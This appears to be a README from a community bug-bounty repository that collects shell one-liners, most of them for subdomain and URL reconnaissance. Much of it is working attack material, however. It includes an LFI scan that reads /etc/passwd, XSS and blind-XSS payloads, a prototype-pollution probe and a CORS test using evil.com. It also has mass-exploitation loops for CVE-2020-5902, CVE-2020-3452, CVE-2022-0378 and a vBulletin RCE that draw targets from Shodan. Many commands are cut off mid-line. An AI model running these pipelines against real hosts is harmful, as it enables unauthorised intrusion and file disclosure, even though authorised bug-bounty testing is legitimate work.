Awesome One-liner Bug Bounty awesome

A collection of awesome one-liner scripts especially for bug bounty.

This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your
contributions and suggestions are heartily♥ welcome.

Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.

1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host , domain.tld , sub.domain.tld , or
127.0.0.1 .

1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS
protocol.
2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
3.1. "FILE.txt" or "FILE {N} .txt" means the files needed to run the command/script according to its context and needs.
4.1. "OUT.txt" or "OUT {N} .txt" means the file as the target storage result will be the command that is executed.

Local File Inclusion

@dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
Open-redirect
@dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $L

@N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /d

XSS
@cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | gr

@fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

@oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

Prototype Pollution
 @R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FI

CVE-2020-5902
@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host

CVE-2020-3452
@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-l

CVE-2022-0378
@7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22t

vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution

@Madrobot_
 shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do

Find JavaScript Files

@D0cK3rG33k

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url |

Extract Endpoints from JavaScript

@renniepak

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Org Information from Target Lists

@steve_mcilwain

for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " |
one | uniq); done

Get Subdomains from RapidDNS.io

@andirrahmani1
 curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#

Get Subdomains from BufferOver.run

@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u

@AnubhavSingh_

export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u

Get Subdomains from Riddler.io

@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from VirusTotal

@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A

Get Subdomain with cyberxplore

 @pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter

@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep

Get Subdomains from Archive

@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e

Get Subdomains from JLDC

@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

@pikpikcu
 curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | gr

Bruteforcing Subdomain using DNS Over

@pikpikcu

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent |

Get Subdomains With sonar.omnisint.io

@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u

Get Subdomains With synapsint.com

@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u

Get Subdomains from crt.sh

@vict0ni

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev
@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

Subdomain Bruteforcer with FFUF

@GochaOqradze

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find Allocated IP Ranges for ASN from IP Address

wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "

Extract IPs from a File

@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?

Ports Scan without CloudFlare

@dwisiswant0
 subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists

@tomnomnom

gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u |

cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep

Find Subdomains TakeOver

@hahwul

subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE

Dump Custom URLs from ParamSpider

@hahwul
 cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;

URLs Probing with cURL + Parallel

@akita_zen

cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list

@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].

Dump In-scope Assets from bounty-targets-data

@dwisiswant0

HackerOne Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_sc

BugCrowd Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.t

Intigriti Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.

YesWeHack Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.

HackenProof Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] |

Federacy Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.t

Dump URLs from sitemap.xml

@healthyoutlet

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure Bash Linkfinder

@ntrzz
 curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python

Extract Endpoints from swagger.json

@zer0pwn

curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration
@manas_hunter

site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.c

Find Hidden Servers and/or Admin Panels

@rez0__

ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt

Recon Using api.recon.dev

@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain

Find Live Host/Domain/Assets
@YashGoti

subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf
@HacktifyS

waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | g

Get Subdomains from IPs

@laughface809

python3 hosthunter.py HOSTS.txt > OUT.txt

Gather Domains from Content-Security-Policy

@geeknik

curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._

Nmap IP:PORT Parser Piped to HTTPX

@dwisiswant0
nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | http